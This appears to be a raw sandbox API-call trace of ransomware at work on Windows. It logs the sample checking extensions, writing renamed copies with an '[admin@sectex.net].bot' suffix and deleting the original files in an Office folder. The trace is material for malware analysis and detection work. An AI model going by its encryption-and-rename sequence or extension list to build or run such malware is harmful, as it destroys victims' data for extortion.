	[0150.261] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SAVASWEB.VSL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.261] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SAVASWEB.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\savasweb.vsl")) returned 1
	[0150.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SAVASWEB.VSL") returned 60
	[0150.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SAVASWEB.VSL") returned 60
	[0150.262] lstrlenW (lpString=".doc") returned 4
	[0150.262] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0150.262] lstrlenW (lpString=".docx") returned 5
	[0150.262] lstrcmpiW (lpString1=".docx", lpString2="B.VSL") returned -1
	[0150.262] lstrlenW (lpString=".pdf") returned 4
	[0150.262] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0150.262] lstrlenW (lpString=".xls") returned 4
	[0150.262] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0150.262] lstrlenW (lpString=".xlsx") returned 5
	[0150.262] lstrcmpiW (lpString1=".xlsx", lpString2="B.VSL") returned -1
	[0150.262] lstrlenW (lpString=".ppt") returned 4
	[0150.262] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0150.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SAVASWEB.VSL") returned 60
	[0150.262] lstrlenW (lpString=".zip") returned 4
	[0150.262] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0150.262] lstrlenW (lpString=".rar") returned 4
	[0150.262] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0150.262] lstrlenW (lpString=".bz2") returned 4
	[0150.262] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0150.262] lstrlenW (lpString=".7z") returned 3
	[0150.262] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0150.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SAVASWEB.VSL") returned 60
	[0150.262] lstrlenW (lpString=".dbf") returned 4
	[0150.263] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0150.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SAVASWEB.VSL") returned 60
	[0150.263] lstrlenW (lpString=".1cd") returned 4
	[0150.263] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0150.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SAVASWEB.VSL") returned 60
	[0150.263] lstrlenW (lpString=".jpg") returned 4
	[0150.263] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0150.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SAVASWEB.VSL") returned 60
	[0150.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SAVASWEB.VSL") returned 60
	[0150.462] lstrlenW (lpString=".doc") returned 4
	[0150.462] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0150.462] lstrlenW (lpString=".docx") returned 5
	[0150.462] lstrcmpiW (lpString1=".docx", lpString2="B.VSL") returned -1
	[0150.462] lstrlenW (lpString=".pdf") returned 4
	[0150.462] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0150.463] lstrlenW (lpString=".xls") returned 4
	[0150.463] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0150.463] lstrlenW (lpString=".xlsx") returned 5
	[0150.463] lstrcmpiW (lpString1=".xlsx", lpString2="B.VSL") returned -1
	[0150.463] lstrlenW (lpString=".ppt") returned 4
	[0150.463] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0150.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SAVASWEB.VSL") returned 60
	[0150.463] lstrlenW (lpString=".zip") returned 4
	[0150.463] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0150.463] lstrlenW (lpString=".rar") returned 4
	[0150.463] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0150.463] lstrlenW (lpString=".bz2") returned 4
	[0150.463] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0150.463] lstrlenW (lpString=".7z") returned 3
	[0150.463] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0150.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SAVASWEB.VSL") returned 60
	[0150.463] lstrlenW (lpString=".dbf") returned 4
	[0150.463] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0150.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SAVASWEB.VSL") returned 60
	[0150.463] lstrlenW (lpString=".1cd") returned 4
	[0150.463] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0150.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SAVASWEB.VSL") returned 60
	[0150.463] lstrlenW (lpString=".jpg") returned 4
	[0150.463] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0150.463] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".bot") returned 1
	[0150.463] lstrlenW (lpString="SGRES.DLL.IDX_DLL") returned 17
	[0150.463] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\sgres.dll.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0150.478] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=11648) returned 1
	[0150.478] CloseHandle (hObject=0x3d0) returned 1
	[0150.478] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\sgres.dll.idx_dll")) returned 0x20
	[0150.540] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\sgres.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.845] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\sgres.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0150.877] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.877] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.877] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\sgres.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0151.922] GetLastError () returned 0x0
	[0151.922] ReadFile (in: hFile=0x388, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x2d80, lpOverlapped=0x0) returned 1
	[0151.936] WriteFile (in: hFile=0x3f0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x2d90, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x2d90, lpOverlapped=0x0) returned 1
	[0151.936] ReadFile (in: hFile=0x388, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0151.937] WriteFile (in: hFile=0x3f0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xf6, lpOverlapped=0x0) returned 1
	[0151.937] SetEndOfFile (hFile=0x3f0) returned 1
	[0151.937] CloseHandle (hObject=0x3f0) returned 1
	[0151.937] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0151.937] SetEndOfFile (hFile=0x388) returned 1
	[0151.939] CloseHandle (hObject=0x388) returned 1
	[0151.940] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.417] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\sgres.dll.idx_dll")) returned 1
	[0152.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL.IDX_DLL") returned 65
	[0152.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL.IDX_DLL") returned 65
	[0152.459] lstrlenW (lpString=".doc") returned 4
	[0152.459] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0152.459] lstrlenW (lpString=".docx") returned 5
	[0152.459] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0152.459] lstrlenW (lpString=".pdf") returned 4
	[0152.459] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0152.459] lstrlenW (lpString=".xls") returned 4
	[0152.459] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0152.459] lstrlenW (lpString=".xlsx") returned 5
	[0152.459] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0152.459] lstrlenW (lpString=".ppt") returned 4
	[0152.459] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0152.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL.IDX_DLL") returned 65
	[0152.459] lstrlenW (lpString=".zip") returned 4
	[0152.459] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0152.459] lstrlenW (lpString=".rar") returned 4
	[0152.459] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0152.459] lstrlenW (lpString=".bz2") returned 4
	[0152.459] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0152.459] lstrlenW (lpString=".7z") returned 3
	[0152.459] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0152.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL.IDX_DLL") returned 65
	[0152.459] lstrlenW (lpString=".dbf") returned 4
	[0152.459] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0152.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL.IDX_DLL") returned 65
	[0152.459] lstrlenW (lpString=".1cd") returned 4
	[0152.459] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0152.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL.IDX_DLL") returned 65
	[0152.459] lstrlenW (lpString=".jpg") returned 4
	[0152.460] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0152.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL.IDX_DLL") returned 65
	[0152.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL.IDX_DLL") returned 65
	[0152.460] lstrlenW (lpString=".doc") returned 4
	[0152.460] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0152.460] lstrlenW (lpString=".docx") returned 5
	[0152.460] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0152.460] lstrlenW (lpString=".pdf") returned 4
	[0152.460] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0152.460] lstrlenW (lpString=".xls") returned 4
	[0152.460] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0152.460] lstrlenW (lpString=".xlsx") returned 5
	[0152.460] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0152.460] lstrlenW (lpString=".ppt") returned 4
	[0152.460] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0152.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL.IDX_DLL") returned 65
	[0152.460] lstrlenW (lpString=".zip") returned 4
	[0152.460] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0152.460] lstrlenW (lpString=".rar") returned 4
	[0152.460] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0152.460] lstrlenW (lpString=".bz2") returned 4
	[0152.460] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0152.460] lstrlenW (lpString=".7z") returned 3
	[0152.460] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0152.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL.IDX_DLL") returned 65
	[0152.460] lstrlenW (lpString=".dbf") returned 4
	[0152.460] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0152.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL.IDX_DLL") returned 65
	[0152.460] lstrlenW (lpString=".1cd") returned 4
	[0152.461] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0152.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SGRES.DLL.IDX_DLL") returned 65
	[0152.461] lstrlenW (lpString=".jpg") returned 4
	[0152.461] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0152.461] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".bot") returned 1
	[0152.461] lstrlenW (lpString="VISBRRES.DLL.IDX_DLL") returned 20
	[0152.461] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visbrres.dll.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0152.488] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=19328) returned 1
	[0152.488] CloseHandle (hObject=0x31c) returned 1
	[0152.488] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visbrres.dll.idx_dll")) returned 0x20
	[0152.567] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visbrres.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.568] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visbrres.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0152.568] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.568] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.568] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visbrres.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0152.569] GetLastError () returned 0x0
	[0152.569] ReadFile (in: hFile=0x3f0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x4b80, lpOverlapped=0x0) returned 1
	[0152.592] WriteFile (in: hFile=0x38c, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x4b90, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x4b90, lpOverlapped=0x0) returned 1
	[0152.593] ReadFile (in: hFile=0x3f0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.593] WriteFile (in: hFile=0x38c, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xfc, lpOverlapped=0x0) returned 1
	[0152.594] SetEndOfFile (hFile=0x38c) returned 1
	[0152.594] CloseHandle (hObject=0x38c) returned 1
	[0152.594] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.594] SetEndOfFile (hFile=0x3f0) returned 1
	[0152.596] CloseHandle (hObject=0x3f0) returned 1
	[0152.596] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.597] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visbrres.dll.idx_dll")) returned 1
	[0152.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL.IDX_DLL") returned 68
	[0152.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL.IDX_DLL") returned 68
	[0152.597] lstrlenW (lpString=".doc") returned 4
	[0152.597] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0152.597] lstrlenW (lpString=".docx") returned 5
	[0152.597] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0152.597] lstrlenW (lpString=".pdf") returned 4
	[0152.597] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0152.598] lstrlenW (lpString=".xls") returned 4
	[0152.598] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0152.598] lstrlenW (lpString=".xlsx") returned 5
	[0152.598] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0152.598] lstrlenW (lpString=".ppt") returned 4
	[0152.598] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0152.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL.IDX_DLL") returned 68
	[0152.598] lstrlenW (lpString=".zip") returned 4
	[0152.598] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0152.598] lstrlenW (lpString=".rar") returned 4
	[0152.598] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0152.598] lstrlenW (lpString=".bz2") returned 4
	[0152.598] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0152.598] lstrlenW (lpString=".7z") returned 3
	[0152.598] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0152.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL.IDX_DLL") returned 68
	[0152.598] lstrlenW (lpString=".dbf") returned 4
	[0152.598] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0152.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL.IDX_DLL") returned 68
	[0152.598] lstrlenW (lpString=".1cd") returned 4
	[0152.598] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0152.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL.IDX_DLL") returned 68
	[0152.598] lstrlenW (lpString=".jpg") returned 4
	[0152.598] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0152.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL.IDX_DLL") returned 68
	[0152.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL.IDX_DLL") returned 68
	[0152.598] lstrlenW (lpString=".doc") returned 4
	[0152.598] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0152.598] lstrlenW (lpString=".docx") returned 5
	[0152.598] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0152.599] lstrlenW (lpString=".pdf") returned 4
	[0152.599] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0152.599] lstrlenW (lpString=".xls") returned 4
	[0152.599] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0152.599] lstrlenW (lpString=".xlsx") returned 5
	[0152.599] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0152.599] lstrlenW (lpString=".ppt") returned 4
	[0152.599] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0152.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL.IDX_DLL") returned 68
	[0152.599] lstrlenW (lpString=".zip") returned 4
	[0152.599] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0152.599] lstrlenW (lpString=".rar") returned 4
	[0152.599] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0152.599] lstrlenW (lpString=".bz2") returned 4
	[0152.599] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0152.599] lstrlenW (lpString=".7z") returned 3
	[0152.599] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0152.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL.IDX_DLL") returned 68
	[0152.599] lstrlenW (lpString=".dbf") returned 4
	[0152.599] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0152.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL.IDX_DLL") returned 68
	[0152.599] lstrlenW (lpString=".1cd") returned 4
	[0152.599] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0152.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL.IDX_DLL") returned 68
	[0152.599] lstrlenW (lpString=".jpg") returned 4
	[0152.599] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0152.599] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".bot") returned 1
	[0152.600] lstrlenW (lpString="VISINTL.DLL.IDX_DLL") returned 19
	[0152.600] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visintl.dll.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0152.637] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=240000) returned 1
	[0152.637] CloseHandle (hObject=0x3f8) returned 1
	[0152.637] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visintl.dll.idx_dll")) returned 0x20
	[0152.637] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visintl.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.637] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visintl.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0152.638] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.638] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.638] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visintl.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0152.638] GetLastError () returned 0x0
	[0152.638] ReadFile (in: hFile=0x3f8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x3a980, lpOverlapped=0x0) returned 1
	[0152.671] WriteFile (in: hFile=0x3c8, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x3a990, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x3a990, lpOverlapped=0x0) returned 1
	[0152.676] ReadFile (in: hFile=0x3f8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.676] WriteFile (in: hFile=0x3c8, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xfa, lpOverlapped=0x0) returned 1
	[0152.676] SetEndOfFile (hFile=0x3c8) returned 1
	[0152.676] CloseHandle (hObject=0x3c8) returned 1
	[0152.676] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.676] SetEndOfFile (hFile=0x3f8) returned 1
	[0152.681] CloseHandle (hObject=0x3f8) returned 1
